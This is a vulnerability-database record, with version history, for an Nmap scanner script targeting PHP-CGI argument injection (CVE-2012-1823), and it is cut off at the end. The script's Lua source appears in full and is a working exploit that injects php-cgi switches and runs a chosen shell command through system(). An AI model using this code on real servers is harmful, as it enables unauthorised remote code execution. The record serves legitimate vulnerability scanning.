{"id": "NMAP:HTTP-VULN-CVE2012-1823.NSE", "bulletinFamily": "scanner", "title": "http-vuln-cve2012-1823 NSE Script", "description": "Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely. \n\nThe script works by appending \"?-s\" to the uri to make vulnerable php-cgi handlers return colour syntax highlighted source. We use the pattern \"&lt;span style=.*&gt;&amp;lt;?\" to detect vulnerable installations.\n\n## Script Arguments \n\n#### http-vuln-cve2012-1823.uri \n\nURI. Default: /index.php\n\n#### http-vuln-cve2012-1823.cmd \n\nCMD. Default: uname -a\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -sV --script http-vuln-cve2012-1823 <target>\n nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-vuln-cve2012-1823:\n | VULNERABLE:\n | PHP-CGI Remote code execution and source code disclosure\n | State: VULNERABLE (Exploitable)\n | IDs: CVE:2012-1823\n | Description:\n | According to PHP's website, \"PHP is a widely-used general-purpose\n | scripting language that is especially suited for Web development and\n | can be embedded into HTML.\" When PHP is used in a CGI-based setup\n | (such as Apache's mod_cgid), the php-cgi receives a processed query\n | string parameter as command line arguments which allows command-line\n | switches, such as -s, -d or -c to be passed to the php-cgi binary,\n | which can be exploited to disclose source code and obtain arbitrary\n | code execution.\n | Disclosure date: 2012-05-03\n | Extra information:\n | Proof of Concept:/index.php?-s\n | References:\n | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\n | http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823\n |_ http://ompldr.org/vZGxxaQ\n \n\n## Requires \n\n * http\n * shortport\n * stdnse\n * string\n * vulns\n\n* * *\n", "published": "2012-05-08T05:56:04", "modified": "2016-06-09T22:46:42", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2012-1823.html", "reporter": "Paulino Calderon <calderon@websec.mx>, Paul AMAR <aos.paul@gmail.com>", "references": [], "cvelist": ["CVE-2012-1823"], "type": "nmap", "lastseen": "2019-05-30T17:04:51", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1823"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely. \n\nThe script works by appending \"?-s\" to the uri to make vulnerable php-cgi handlers return colour syntax highlighted source. We use the pattern \"&lt;span style=.*&gt;&amp;lt;?\" to detect vulnerable installations.\n\n## Script Arguments \n\n#### http-vuln-cve2012-1823.uri \n\nURI. Default: /index.php\n\n#### http-vuln-cve2012-1823.cmd \n\nCMD. Default: uname -a\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -sV --script http-vuln-cve2012-1823 <target>\n nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-vuln-cve2012-1823:\n | VULNERABLE:\n | PHP-CGI Remote code execution and source code disclosure\n | State: VULNERABLE (Exploitable)\n | IDs: CVE:2012-1823\n | Description:\n | According to PHP's website, \"PHP is a widely-used general-purpose\n | scripting language that is especially suited for Web development and\n | can be embedded into HTML.\" When PHP is used in a CGI-based setup\n | (such as Apache's mod_cgid), the php-cgi receives a processed query\n | string parameter as command line arguments which allows command-line\n | switches, such as -s, -d or -c to be passed to the php-cgi binary,\n | which can be exploited to disclose source code and obtain arbitrary\n | code execution.\n | Disclosure date: 2012-05-03\n | Extra information:\n | Proof of Concept:/index.php?-s\n | References:\n | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\n | http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823\n |_ http://ompldr.org/vZGxxaQ\n \n\n## Requires \n\n * http\n * shortport\n * stdnse\n * string\n * vulns\n\n* * *\n", "edition": 5, "enchantments": {"dependencies": {"modified": "2018-07-12T16:22:59", "references": [{"idList": ["SMNTC-53388"], "type": "symantec"}, {"idList": ["60DE13D5-95F0-11E1-806A-001143CD36D8"], "type": "freebsd"}, {"idList": ["OPENVAS:71384", "OPENVAS:1361412562310123926", "OPENVAS:1361412562310123924", "OPENVAS:881165", "OPENVAS:1361412562310881165", "OPENVAS:831624", "OPENVAS:1361412562310870591", "OPENVAS:881180", "OPENVAS:136141256231071384", "OPENVAS:1361412562310870593"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:28089"], "type": "securityvulns"}, {"idList": ["USN-1437-1"], "type": "ubuntu"}, {"idList": ["PHP_5_4_2.NASL", "ALA_ALAS-2012-77.NASL", "REDHAT-RHSA-2012-0546.NASL", "CENTOS_RHSA-2012-0547.NASL", "FREEBSD_PKG_60DE13D595F011E1806A001143CD36D8.NASL", "SL_20120507_PHP_ON_SL5_X.NASL", "ORACLELINUX_ELSA-2012-0546.NASL", "REDHAT-RHSA-2012-0568.NASL", "SL_20120507_PHP53_ON_SL5_X.NASL", "CENTOS_RHSA-2012-0546.NASL"], "type": "nessus"}, {"idList": ["RHSA-2012:0547", "RHSA-2012:0546", "RHSA-2012:0570", "RHSA-2012:0569", "RHSA-2012:0568"], "type": "redhat"}, {"idList": ["SSV:61070", "SSV:72859", "SSV:72860", "SSV:60093", "SSV:60536", "SSV:82805", "SSV:79637"], "type": "seebug"}, {"idList": ["CESA-2012:0547", "CESA-2012:0546"], "type": "centos"}, {"idList": ["CVE-2012-1823"], "type": "cve"}, {"idList": ["VU:520827", "VU:673343"], "type": "cert"}, {"idList": ["ALAS-2012-077"], "type": "amazon"}, {"idList": ["PHP_CGI_REMOTE"], "type": "canvas"}, {"idList": ["THN:26139DCDB80F29AA56F9DB9ADFBD986B", "THN:F0587F0EFE1B937682CDBA5338BDE708"], "type": "thn"}, {"idList": ["1337DAY-ID-21429"], "type": "zdt"}, {"idList": ["OPENSUSE-SU-2012:0590-1"], "type": "suse"}, {"idList": ["THREATPOST:3EEA9D9B7CBDC9687FD961AD1AF59EF5", "THREATPOST:9FD19F2ACF1E3C44BAE775A250F1E132", "THREATPOST:4E1049C3C10581837DF71F684CB00683", "THREATPOST:A5E5D5921DAB8BB3CACFA91664901B61", "THREATPOST:2FB93CCBD166A84F825AED5B7F560EAD", "THREATPOST:D5EC8CB37BD901EEB297B27AA18015A9", "THREATPOST:8373133ADE8051980B6223ED1B2EBEF3", "THREATPOST:51FB010AA47AEB7BA9A071B3DC8D9989", "THREATPOST:2ED66EF5DD7C982DF96F2B1625E26ABB"], "type": "threatpost"}, {"idList": ["ELSA-2012-0546", "ELSA-2012-0547"], "type": "oraclelinux"}, {"idList": ["MSF:EXPLOIT/MULTI/HTTP/PHP_CGI_ARG_INJECTION"], "type": "metasploit"}, {"idList": ["SAINT:383F4FB67DCF7CAE7E06F44A5B5DC13F", "SAINT:4757B9E50DEDA6FBFE3C977620C279FB", "SAINT:A44F3BA5218E70289A3DA48E0A2F5B88"], "type": "saint"}, {"idList": ["PACKETSTORM:112486", "PACKETSTORM:119075", "PACKETSTORM:112477", "PACKETSTORM:112971", "PACKETSTORM:123859", "PACKETSTORM:123833"], "type": "packetstorm"}]}, "score": {"value": 7.2, "vector": "NONE"}}, "hash": "e865991c517b5e831211002bd601c297c89f2aea3a499e3c7073d8ca68cca4d4", "hashmap": [{"hash": "9113a85b267aed75977d6ed682018644", "key": "href"}, {"hash": "500a198d83b3613a2c02385748f4c791", "key": "published"}, {"hash": "df2d2ee6f6c5084686686b567f4d6e90", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "027df2dddb7c093c8df7b95fe71a8da3", "key": "cvelist"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "2c264e6f89226c1e583fbe7641d70ac7", "key": "title"}, {"hash": "7a829ace16e007283a890055e1220c35", "key": "sourceData"}, {"hash": "9a5718258d0efd39579c9a90341563fb", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "146a8f6234ccf13c8678beda79d2f29a", "key": "nmap"}, {"hash": "513cd49ca78a02aaf27fbe2b0558ceec", "key": "modified"}], "history": [], "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2012-1823.html", "id": "NMAP:HTTP-VULN-CVE2012-1823.NSE", "lastseen": "2018-07-12T16:22:59", "modified": "2016-06-09T22:46:42", "nmap": {"categories": ["exploit", "vuln", "intrusive"], "scriptType": "portrule"}, "objectVersion": "1.3", "published": "2012-05-08T05:56:04", "references": [], "reporter": "Paulino Calderon <calderon@websec.mx>, Paul AMAR <aos.paul@gmail.com>", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nDetects PHP-CGI installations that are vulnerable to CVE-2012-1823, This\ncritical vulnerability allows attackers to retrieve source code and execute\ncode remotely.\n\nThe script works by appending \"?-s\" to the uri to make vulnerable php-cgi\nhandlers return colour syntax highlighted source. We use the pattern \"<span\nstyle=.*>&lt;?\" to detect\nvulnerable installations.\n]]\n\n---\n-- @usage\n-- nmap -sV --script http-vuln-cve2012-1823 <target>\n-- nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-vuln-cve2012-1823:\n-- | VULNERABLE:\n-- | PHP-CGI Remote code execution and source code disclosure\n-- | State: VULNERABLE (Exploitable)\n-- | IDs: CVE:2012-1823\n-- | Description:\n-- | According to PHP's website, \"PHP is a widely-used general-purpose\n-- | scripting language that is especially suited for Web development and\n-- | can be embedded into HTML.\" When PHP is used in a CGI-based setup\n-- | (such as Apache's mod_cgid), the php-cgi receives a processed query\n-- | string parameter as command line arguments which allows command-line\n-- | switches, such as -s, -d or -c to be passed to the php-cgi binary,\n-- | which can be exploited to disclose source code and obtain arbitrary\n-- | code execution.\n-- | Disclosure date: 2012-05-03\n-- | Extra information:\n-- | Proof of Concept:/index.php?-s\n-- | References:\n-- | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\n-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823\n-- |_ http://ompldr.org/vZGxxaQ\n--\n-- @args http-vuln-cve2012-1823.uri URI. Default: /index.php\n-- @args http-vuln-cve2012-1823.cmd CMD. Default: uname -a\n---\n\nauthor = {\"Paulino Calderon <calderon@websec.mx>\", \"Paul AMAR <aos.paul@gmail.com>\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"exploit\",\"vuln\",\"intrusive\"}\n\n\nportrule = shortport.http\n\naction = function(host, port)\n local uri = stdnse.get_script_args(SCRIPT_NAME..\".uri\") or \"/\"\n local cmd = stdnse.get_script_args(SCRIPT_NAME..\".cmd\") or \"uname -a\"\n\n local vuln = {\n title = 'PHP-CGI Remote code execution and source code disclosure',\n state = vulns.STATE.NOT_VULN, -- default\n IDS = {CVE = '2012-1823'},\n description = [[\nAccording to PHP's website, \"PHP is a widely-used general-purpose\nscripting language that is especially suited for Web development and\ncan be embedded into HTML.\" When PHP is used in a CGI-based setup\n(such as Apache's mod_cgid), the php-cgi receives a processed query\nstring parameter as command line arguments which allows command-line\nswitches, such as -s, -d or -c to be passed to the php-cgi binary,\nwhich can be exploited to disclose source code and obtain arbitrary\ncode execution.]],\n references = {\n 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/',\n 'http://ompldr.org/vZGxxaQ',\n },\n dates = {\n disclosure = {year = '2012', month = '05', day = '03'},\n },\n }\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n\n stdnse.debug2(\"Trying detection using echo command\")\n local detection_session = http.post(host, port, uri..\"?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input\", { no_cache = true }, nil, \"<?php system('echo NmapCVEIdentification');die(); ?>\")\n if detection_session and detection_session.status == 200 then\n if string.match(detection_session.body, \"NmapCVEIdentification\") then\n stdnse.debug1(\"The website seems vulnerable to CVE-2012-1823.\")\n else\n return\n end\n end\n\n stdnse.debug2(\"Trying Command... \" .. cmd)\n local exploitation_session = http.post(host, port, uri..\"?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input\", { no_cache = true }, nil, \"<?php system('\"..cmd..\"');die(); ?>\")\n if exploitation_session and exploitation_session.status == 200 then\n stdnse.debug1(\"Ouput of the command \" .. cmd .. \" : \\n\"..exploitation_session.body)\n vuln.state = vulns.STATE.EXPLOIT\n return vuln_report:make_output(exploitation_session.body)\n end\nend\n", "title": "http-vuln-cve2012-1823 NSE Script", "type": "nmap", "viewCount": 122}, "differentElements": ["description"], "edition": 5, "lastseen": "2018-07-12T16:22:59"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely. \n\nThe script works by appending \"?-s\" to the uri to make vulnerable php-cgi handlers return colour syntax highlighted source. We use the pattern \"&lt;span style=.*&gt;&amp;lt;?\" to detect vulnerable installations.\n\n## Script Arguments \n\n#### http-vuln-cve2012-1823.uri \n\nURI. Default: /index.php\n\n#### http-vuln-cve2012-1823.cmd \n\nCMD. Default: uname -a\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -sV --script http-vuln-cve2012-1823 <target>\n nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-vuln-cve2012-1823:\n | VULNERABLE:\n | PHP-CGI Remote code execution and source code disclosure\n | State: VULNERABLE (Exploitable)\n | IDs: CVE:2012-1823\n | Description:\n | According to PHP's website, \"PHP is a widely-used general-purpose\n | scripting language that is especially suited for Web development and\n | can be embedded into HTML.\" When PHP is used in a CGI-based setup\n | (such as Apache's mod_cgid), the php-cgi receives a processed query\n | string parameter as command line arguments which allows command-line\n | switches, such as -s, -d or -c to be passed to the php-cgi binary,\n | which can be exploited to disclose source code and obtain arbitrary\n | code execution.\n | Disclosure date: 2012-05-03\n | Extra information:\n | Proof of Concept:/index.php?-s\n | References:\n | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\n | http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823\n |_ http://ompldr.org/vZGxxaQ\n \n\n## Requires \n\n * http\n * shortport\n * stdnse\n * string\n * vulns\n\n* * *\n", "edition": 3, "enchantments": {}, "hash": "ff31f3c53da42d7a6ee36d221c1d7d89456600801f8824b9b1ac54fa16a96d17", "hashmap": [{"hash": "9113a85b267aed75977d6ed682018644", "key": "href"}, {"hash": "500a198d83b3613a2c02385748f4c791", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "3c37936ce5ec058f62a3f3c6fcdfe3a1", "key": "sourceData"}, {"hash": "2c264e6f89226c1e583fbe7641d70ac7", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "9a5718258d0efd39579c9a90341563fb", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "9c510c5788e051b17b27c58a7e7035a9", "key": "description"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "146a8f6234ccf13c8678beda79d2f29a", "key": "nmap"}, {"hash": "513cd49ca78a02aaf27fbe2b0558ceec", "key": "modified"}], "history": [], "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2012-1823.html", "id": "NMAP:HTTP-VULN-CVE2012-1823.NSE", "lastseen": "2017-08-23T16:40:32", "modified": "2016-06-09T22:46:42", "nmap": {"categories": ["exploit", "vuln", "intrusive"], "scriptType": "portrule"}, "objectVersion": "1.3", "published": "2012-05-08T05:56:04", "references": [], "reporter": "Paulino Calderon <calderon@websec.mx>, Paul AMAR <aos.paul@gmail.com>", "sourceData": "500: Internal Server Error\n", "title": "http-vuln-cve2012-1823 NSE Script", "type": "nmap", "viewCount": 8}, "differentElements": ["cvss", "cvelist", "sourceData"], "edition": 3, "lastseen": "2017-08-23T16:40:32"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2012-1823"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely. \n\nThe script works by appending \"?-s\" to the uri to make vulnerable php-cgi handlers return colour syntax highlighted source. We use the pattern \"&lt;span style=.*&gt;&amp;lt;?\" to detect vulnerable installations.\n\n## Script Arguments \n\n#### http-vuln-cve2012-1823.uri \n\nURI. Default: /index.php\n\n#### http-vuln-cve2012-1823.cmd \n\nCMD. Default: uname -a\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -sV --script http-vuln-cve2012-1823 <target>\n nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-vuln-cve2012-1823:\n | VULNERABLE:\n | PHP-CGI Remote code execution and source code disclosure\n | State: VULNERABLE (Exploitable)\n | IDs: CVE:2012-1823\n | Description:\n | According to PHP's website, \"PHP is a widely-used general-purpose\n | scripting language that is especially suited for Web development and\n | can be embedded into HTML.\" When PHP is used in a CGI-based setup\n | (such as Apache's mod_cgid), the php-cgi receives a processed query\n | string parameter as command line arguments which allows command-line\n | switches, such as -s, -d or -c to be passed to the php-cgi binary,\n | which can be exploited to disclose source code and obtain arbitrary\n | code execution.\n | Disclosure date: 2012-05-03\n | Extra information:\n | Proof of Concept:/index.php?-s\n | References:\n | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\n | http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823\n |_ http://ompldr.org/vZGxxaQ\n \n\n## Requires \n\n * http\n * shortport\n * stdnse\n * string\n * vulns\n\n* * *\n", "edition": 1, "hash": "a7cdf9d1a6edf2ac20fa0d3a07785fc7d78762a3358a3105212e8d6d0df1ecf3", "hashmap": [{"hash": "9113a85b267aed75977d6ed682018644", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "500a198d83b3613a2c02385748f4c791", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "027df2dddb7c093c8df7b95fe71a8da3", "key": "cvelist"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "2c264e6f89226c1e583fbe7641d70ac7", "key": "title"}, {"hash": "106eedce763084648174cdcd5cdf5e40", "key": "description"}, {"hash": "7a829ace16e007283a890055e1220c35", "key": "sourceData"}, {"hash": "9a5718258d0efd39579c9a90341563fb", "key": "reporter"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "146a8f6234ccf13c8678beda79d2f29a", "key": "nmap"}, {"hash": "513cd49ca78a02aaf27fbe2b0558ceec", "key": "modified"}], "history": [], "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2012-1823.html", "id": "NMAP:HTTP-VULN-CVE2012-1823.NSE", "lastseen": "2016-09-17T11:15:03", "modified": "2016-06-09T22:46:42", "nmap": {"categories": ["exploit", "vuln", "intrusive"], "scriptType": "portrule"}, "objectVersion": "1.2", "published": "2012-05-08T05:56:04", "references": [], "reporter": "Paulino Calderon <calderon@websec.mx>, Paul AMAR <aos.paul@gmail.com>", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nDetects PHP-CGI installations that are vulnerable to CVE-2012-1823, This\ncritical vulnerability allows attackers to retrieve source code and execute\ncode remotely.\n\nThe script works by appending \"?-s\" to the uri to make vulnerable php-cgi\nhandlers return colour syntax highlighted source. We use the pattern \"<span\nstyle=.*>&lt;?\" to detect\nvulnerable installations.\n]]\n\n---\n-- @usage\n-- nmap -sV --script http-vuln-cve2012-1823 <target>\n-- nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-vuln-cve2012-1823:\n-- | VULNERABLE:\n-- | PHP-CGI Remote code execution and source code disclosure\n-- | State: VULNERABLE (Exploitable)\n-- | IDs: CVE:2012-1823\n-- | Description:\n-- | According to PHP's website, \"PHP is a widely-used general-purpose\n-- | scripting language that is especially suited for Web development and\n-- | can be embedded into HTML.\" When PHP is used in a CGI-based setup\n-- | (such as Apache's mod_cgid), the php-cgi receives a processed query\n-- | string parameter as command line arguments which allows command-line\n-- | switches, such as -s, -d or -c to be passed to the php-cgi binary,\n-- | which can be exploited to disclose source code and obtain arbitrary\n-- | code execution.\n-- | Disclosure date: 2012-05-03\n-- | Extra information:\n-- | Proof of Concept:/index.php?-s\n-- | References:\n-- | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\n-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823\n-- |_ http://ompldr.org/vZGxxaQ\n--\n-- @args http-vuln-cve2012-1823.uri URI. Default: /index.php\n-- @args http-vuln-cve2012-1823.cmd CMD. Default: uname -a\n---\n\nauthor = {\"Paulino Calderon <calderon@websec.mx>\", \"Paul AMAR <aos.paul@gmail.com>\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"exploit\",\"vuln\",\"intrusive\"}\n\n\nportrule = shortport.http\n\naction = function(host, port)\n local uri = stdnse.get_script_args(SCRIPT_NAME..\".uri\") or \"/\"\n local cmd = stdnse.get_script_args(SCRIPT_NAME..\".cmd\") or \"uname -a\"\n\n local vuln = {\n title = 'PHP-CGI Remote code execution and source code disclosure',\n state = vulns.STATE.NOT_VULN, -- default\n IDS = {CVE = '2012-1823'},\n description = [[\nAccording to PHP's website, \"PHP is a widely-used general-purpose\nscripting language that is especially suited for Web development and\ncan be embedded into HTML.\" When PHP is used in a CGI-based setup\n(such as Apache's mod_cgid), the php-cgi receives a processed query\nstring parameter as command line arguments which allows command-line\nswitches, such as -s, -d or -c to be passed to the php-cgi binary,\nwhich can be exploited to disclose source code and obtain arbitrary\ncode execution.]],\n references = {\n 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/',\n 'http://ompldr.org/vZGxxaQ',\n },\n dates = {\n disclosure = {year = '2012', month = '05', day = '03'},\n },\n }\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n\n stdnse.debug2(\"Trying detection using echo command\")\n local detection_session = http.post(host, port, uri..\"?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input\", { no_cache = true }, nil, \"<?php system('echo NmapCVEIdentification');die(); ?>\")\n if detection_session and detection_session.status == 200 then\n if string.match(detection_session.body, \"NmapCVEIdentification\") then\n stdnse.debug1(\"The website seems vulnerable to CVE-2012-1823.\")\n else\n return\n end\n end\n\n stdnse.debug2(\"Trying Command... \" .. cmd)\n local exploitation_session = http.post(host, port, uri..\"?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input\", { no_cache = true }, nil, \"<?php system('\"..cmd..\"');die(); ?>\")\n if exploitation_session and exploitation_session.status == 200 then\n stdnse.debug1(\"Ouput of the command \" .. cmd .. \" : \\n\"..exploitation_session.body)\n vuln.state = vulns.STATE.EXPLOIT\n return vuln_report:make_output(exploitation_session.body)\n end\nend\n", "title": "http-vuln-cve2012-1823 NSE Script", "type": "nmap", "viewCount": 5}, "differentElements": ["description"], "edition": 1, "lastseen": "2016-09-17T11:15:03"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1823"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely. \n\nThe script works by appending \"?-s\" to the uri to make vulnerable php-cgi handlers return colour syntax highlighted source. We use the pattern \"&lt;span style=.*&gt;&amp;lt;?\" to detect vulnerable installations.\n\n## Script Arguments \n\n#### http-vuln-cve2012-1823.uri \n\nURI. Default: /index.php\n\n#### http-vuln-cve2012-1823.cmd \n\nCMD. Default: uname -a\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -sV --script http-vuln-cve2012-1823 <target>\n nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-vuln-cve2012-1823:\n | VULNERABLE:\n | PHP-CGI Remote code execution and source code disclosure\n | State: VULNERABLE (Exploitable)\n | IDs: CVE:2012-1823\n | Description:\n | According to PHP's website, \"PHP is a widely-used general-purpose\n | scripting language that is especially suited for Web development and\n | can be embedded into HTML.\" When PHP is used in a CGI-based setup\n | (such as Apache's mod_cgid), the php-cgi receives a processed query\n | string parameter as command line arguments which allows command-line\n | switches, such as -s, -d or -c to be passed to the php-cgi binary,\n | which can be exploited to disclose source code and obtain arbitrary\n | code execution.\n | Disclosure date: 2012-05-03\n | Extra information:\n | Proof of Concept:/index.php?-s\n | References:\n | http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\n | http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823\n |_ http://ompldr.org/vZGxxaQ\n \n\n## Requires \n\n * http\n * shortport\n * stdnse\n * string\n * vulns\n\n* * *\n", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-05-21T17:05:02", "references": [{"idList": ["REDHAT-RHSA-2012-0569.NASL", "PHP_5_4_2.NASL", "ORACLELINUX_ELSA-2012-0547.NASL", "REDHAT-RHSA-2012-0546.NASL", "CENTOS_RHSA-2012-0547.NASL", "REDHAT-RHSA-2012-0547.NASL", "SL_20120507_PHP_ON_SL5_X.NASL", "ORACLELINUX_ELSA-2012-0546.NASL", "SL_20120507_PHP53_ON_SL5_X.NASL", "CENTOS_RHSA-2012-0546.NASL"], "type": "nessus"}, {"idList": ["SMNTC-53388"], "type": "symantec"}, {"idList": ["60DE13D5-95F0-11E1-806A-001143CD36D8"], "type": "freebsd"}, {"idList": ["SECURITYVULNS:DOC:28089"], "type": "securityvulns"}, {"idList": ["RHSA-2012:0547", "RHSA-2012:0546", "RHSA-2012:0570", "RHSA-2012:0569", "RHSA-2012:0568"], "type": "redhat"}, {"idList": ["SSV:61070", "SSV:72859", "SSV:72860", "SSV:60093", "SSV:60536", "SSV:82805", "SSV:79637"], "type": "seebug"}, {"idList": ["CESA-2012:0547", "CESA-2012:0546"], "type": "centos"}, {"idList": ["CVE-2012-1823"], "type": "cve"}, {"idList": ["VU:520827", "VU:673343"], "type": "cert"}, {"idList": ["ALAS-2012-077"], "type": "amazon"}, {"idList": ["PHP_CGI_REMOTE"], "type": "canvas"}, {"idList": ["THN:26139DCDB80F29AA56F9DB9ADFBD986B", "THN:F0587F0EFE1B937682CDBA5338BDE708"], "type": "thn"}, {"idList": ["1337DAY-ID-21429"], "type": 